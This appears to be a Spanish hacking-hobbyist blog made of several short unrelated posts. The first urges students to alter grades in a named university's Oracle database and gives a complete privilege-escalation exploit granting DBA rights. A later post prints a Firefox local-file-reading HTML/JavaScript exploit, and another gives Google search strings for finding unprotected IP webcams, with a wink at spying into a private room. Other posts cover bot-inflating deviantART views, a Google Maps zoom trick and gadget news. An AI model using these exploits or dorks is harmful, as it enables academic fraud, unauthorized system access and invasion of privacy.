Imaginemos que estamos estudiando en una universidad como la de Alcalá de Henares /uah.es y que somos estudiantes de una carrera (esto está claro sinó no seriamos universitarios) que llevamos más o menos, pero que siempre tenemos alguna asignatura que se nos atasca y no la damos sacado.

Que pasaria si se pudiera cambiar esa nota, eso que tanto hemos visto en películas y que tan bonito nos parece, de la noche a la mañana tener una carrera y ser licenciados (o diplomados que más da :-P )

Pues bien, hoy en dia todo se maneja con ordenadores, si tu cambias la información de una persona en un ordenador, crees que alguien se enteraria? y si ya eres un paranoico y las cambias justo el dia que salen? Crees que alguien se pararia a ver si en verdad esa persona tiene la nota que le puso su profesor. Estamos hablando de 1 alumno entre miles y 1 profesor entre cientos ;-)

Pues bien solo pretendo deciros que sí se puede hacer, que es posible sacarse una carrera y que el unico requisito ahoramismo es que esa nota esté en una base de datos manejada en oracle (justo como ocurre con la uah) y bueno tambien que seamos universitarios o conozcamos el usuario de alguien ( facil de conocer)

El caso, aquí un pequeño fallo que aprovechamos y con nuestro usuario normal nos damos permisos de dba y ala a cambiar notas :-)

select * from user_role_privs;
CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE ‘grant dba to scott’;
COMMIT;
RETURN ”;
END;
/
set serveroutput on
create table mark_tab (id number primary key, text varchar2(80) );
insert into mark_tab values (’1′, ‘All your bases are belong to US’);
create index mark_tab_idx on mark_tab(text)
indextype is ctxsys.context parameters
(’filter ctxsys.null_filter’);
SET SERVEROUTPUT ON;
DECLARE
mklob CLOB;
amt NUMBER := 40;
line VARCHAR2(80);
BEGIN
CTX_DOC.MARKUP(’mark_tab_idx’,'1′,”||scott.HACKIT()||”, mklob);
DBMS_LOB.READ(mklob, amt, 1, line);
DBMS_OUTPUT.PUT_LINE(’QWRvcmUuVS5NeS5TdGFy’||line);
DBMS_LOB.FREETEMPORARY(mklob);
END;
/
select * from user_role_privs;

Se vió que funciona con oracle 10.1.0.2.0 y fue escrito por Alexandr “Sh2kerr” Polyakov

Para quien no conozca deviantart.com decir que es un lugar en internet donde la gente muestra sus diseños o obras de arte. Esto quiere decir que no es un flickr, no es un myspace, aquí hay diseño (o cosas que se le parecen).

Yo conocí deviantart hace muchos años, cuando empezaba en el mundo de Linux, concretamente cuando empezaba con Debian y queria tener un escritorio bonito, para poder presumir delante de la gente que solo usaba windows 95. Claro cuando buscaba devian o debian pues termine en estas páginas.

Como no era de mi agrado nunca me llegué a registra, o lo hice y no me acuerdo jeje :), la cuestión es que años después estoy registrado subiendo algunas de las fotos que hago y opinando sobre fotos de otras personas.

Pero el tema que quiero tratar hoy es el PageViews, que no es más que un contador que muestra el numero de personas que han visitado tu deviant ( o como se le conoce el DA ). Conozco gente que está toda orgullosa de la cantidad de visitas que tiene y lo bueno que es ( no creo que esten tan orgullosos de la poca vida social que generan )… Pero la cuestión es que aplicando un poco de mi querida ingeniería social (viva el hacking que sirve para algo) y un poquito más de programación podemos hacer que esas visitas o ese PageView aumente como la espuma, lo que se dice hackear deviantart para tener más visitas o pagesviews.

Que como se hace eso… pues bien, partimos de la reacción de los usuarios del DA, como norma general podemo decir que:

• El 80% de los usuarios cuando reciben un favorito se pasan por tu página principal para agradecertelo.
• El 90% tienen favoritos de algún trabajo ajeno.
• El 96% tienen a otros usuarios en su punto de mira (conocido como wachers)

Pues bien ahi tenemos el asunto, y eso fue lo que yo aproveche. Ahora algo aún más sencillo solo tenemos que crear un programa que realice las siguientes funciones:

• Que se conecte con mi cuenta de usuario al DA
• Vaya a sus favoritos y los añada también como favoritos mios (aquí son +2 posibles pageviews)
• Vaya a sus wachers y busque en sus favoritos repitiendo el paso anterior.

Como podeís ver esto es un programa que no para de crecer, llamada tras llamada va multiplicando los favoritos. Después solo tienes que esperar a que esos usuarios vean que has favoriteado una imagen suya y te den las gracias ;)

Con este script he llegado a tener más de 200 pageview o visitas por dia en mi DA.

Descarga el Script Druida_DA_HACK.pl [retirado]

El siguiente exploit explota un fallo para firefox 2.0.4 y superiores dando al atacante el poder leer ficheros en la ruta del fichero que hemos seleccionado a la hora de subir algún fichero.

<html>
<body>
<script>
function restore()
{

document.getElementById(”text1″).value=document.getElementById(”file1″).value;
document.getElementById(”text1″).focus();
}

function doKeyDown()
{
document.getElementById(”label1″).focus();
}
</script>

<input type=”file” id=”file1″ name=”file1″ onkeydown=”restore();”
onkeyup=”restore()” />
<label for=”file1″ id=”label1″ name=”label1″></label>
<br>
<textarea name=”text1″ id=”text1″ onkeydown=”doKeyDown()”>
</textarea>
</body>
</html>

Como podeis ver el problema reside en la función focus() y este fallo ha sido encontrado por carl hardwick.

Hasta que punto que alguíen pueda almacenar imagenes tan detalladas de algo asi es bueno? Todos conocemos Google maps, sobretodo ahora que algunos vamos empezar con el geochaching… pero resulta que se puede hackear… bueno es un pequeño hack que logra cosas como estas.

Pues si, es google maps, se acerca tanto a la imagen que se puede ver incluso como están mirando para la avioneta… a mi me parece increible.

Que como hacer esto, pues algunos puntos y ciudades están muy detallados pero el zoom máximo solo llega a un punto, parece ser política de google, pero se puede modificar haciendo lo siguiente:

Vamos a google maps y a algún sitio que nos interese (y que pueda tener este nivel de detalle) como por ejemplo las vegas y el famoso casino-hotel piramide

Ahora le daremos al zoom hasta que no vaya más.

Por ultimo le damos a “link to this page” para que en la barra aparezca la dirección completa, es ahora donde viene el hack

Buscamos donde ponga z= y un numero,pues bien! ese numero se puede cambiar por valores como 20,21,22,23. A mayor numero mayor zoom.

Hack por blog de Philipp Lenssen [via Error500]

No se si lo comenté alguna vez, pero en la Apple Store, tienda online de apple puedes a veces comprar productos apple, como ipod, portatiles, etc que son como una reedición, esto quiere decir que han sido devueltos o que tienen poco uso (lo que se conoce como coche de km 0).

Si estais pensando comprar un portatil apple tendriais que pensarlo bien porque hay casi un 20% de ahorro en los portatiles.

Quien no recuerda la de horas que nos pasabamos antes de la gameboy (pero la primera) en pantalla monocromo y con sonidos que tu madre a los 2 minutos estaba gritando para que quitaras volumen…

pues bien! me encuentro hoy con una página la cual habla de este producto a la venta pero en “almuhadas” o cojines o simplemente como complemento para pasar el rato (se supone que para nuestros hijos, pero yo eso lo veo una escusa para pasar horas y horas haciendo el payaso)

Enlace Daddytypes 

Todo el mundo, o casi todos conocemos el msn, y que en la parte de abajo de algunas ventanas aparece un mensaje como “XYZ esta escribiendo un mensaje” y yo me pregunto… como demonios logran hacer eso?.

Por un momento pensé que podia ser un protocolo que cuando situas el cursos encima del text area para empezar a escribir mandaba paquetes para el otro cliente, pero eso supondria:

1.- sobrecarga de paquetes (supongo que UDP) hacia el cliente, entonces o existe algún metodo de control de estos paquetes o se podria hacer que el cliente se callera si se hace un programa que solo se dedique a mandar paquetes “EE1M - Esta Escribiendo 1 Mensaje”, no lo veo lógico.

2.- Que como sea normal en todo M$ los paquetes se pierdan cada poco, lo que implicaria que el cliente tiene un constante “XYZ esta escribiendo un mensaje”.

No se no se me ocurre nada, alguien sabe como hacen esto?

Ophcrack es un software que tiene como finalidad recuperar esas contraseñas que te perdió la abuela al plancharte la camisa, y tu buen administrador de windows ya no sabes que hacer porque no puedes reinstalar todo (por vagancia más que nada)

Pues tranquilo este software recupera las contraseñas y lo mejor es que funciona en cualquier sistema operativo windows, linux, macos (solo intel) y por si acaso hasta tienen una liveCD…

se libre y que la abuela planche lo que quiera! http://ophcrack.sourceforge.net/

Glx es una tecnologia que creo Novell para poder animar las ventanas de los sistemas linux, como si tuvieras un cubo con los 4 escritorios tipicos de linux.

La verdad es que fue algo que siempre eche en falta, los tipicos escritorios, uno con tu firefox otro con el emule otro con el gimp, no esta nada mal! y claro me parecia raro que no existirera algo parecido para macOS cuando el propio sistema al hacer una migración de usuario hace el efecto cubo este..

Pues bien! si que existe tal cosa, se llama DesktopManager y esta la mar de chulo, porque ademas de los escritorios también tienes el efecto :) yo ya lo tengo y funciona genial.

animaros! http://desktopmanager.berlios.de/ que el proyecto aunque lleve casi 2 años sin una nueva release esta y funciona muy bien

ACTUALIZACIÓN: parece que el photoshop cs no se lleva bien con el, y hace que este en todas las ventanas o en ninguna. y al cerrarlo a mi se me pierden las ventanas… pero… y lo mucho que fardas con los amigos jejeje

Bueno, esto no es que sea un hack propiamente, o si un google hack! o simplemente un fallo de firewall o una seguridad penosa…

El caso: todos conocemos que internet hoy en dia se regula por estandars o bueno eso se trata de hacer, siempre esta microsoft para tocar las pelotes…

Tal y como nos demuestra microsoft cuanto mas se extiende una cosa mas defectos se le encuentran… y ahora es el turno de las webcams, pero de las chulas de las webcams de gama media que funcionan por ip que traen su propio servidor web… y que si no configuramos bien no va molar nada nada…

Algo que creo basico, unas reglas de oro:

• Poner contraseñas de acceso
• Regular con iptables, o algun tipo de firewall para los accesos
• Usar un robot.txt o algo asi para impedir que google nos indexe la webcam

Si el ultimo paso… parece una coña, pero igual que ocurre con la busqueda de mp3 en carpetas alejadas de la mano de dios… pero muy cerca de la mano de google, pues igual resulta que nuestra webcam es indexada por este monstro mecanico.

El caso: y vamos al temita, que ocurre si conocemos la estructura de un servidor web?.. en este caso uno de una webcam (gracias estandars y comercializacion masiva)  pues facil! solo tenemos que preguntarle a google si conoce algun sitio con esa direccion, y os aseguro que google siempre sabe (coñe si sabe sumar no va saber buscar, que es lo suyo!)

muy facil, las axis por definicion, siempre tienen un /view/index.shtml y algunas como las sony tienen un /home/homeA.html… las otras buscarlas vosotros que esto solo es mera informacion.

pues nada algo tan sencillo como poner en google inurl:/home/homeA.html o bueno /view/index.shtml y nos saldra un listado de todo lo que este monstro tiene recogido, algunas son publicas of course pero otras no… y vaya lo bien que te lo pasas cuando encuentras una webcam motorizada que apunta para un parque, pero que como el bicho gira 360º te das cuenta que a su espalda hay una habitacion…

en fin, recordad todo under your responsabilite!

happy hacking como diria Richi stalman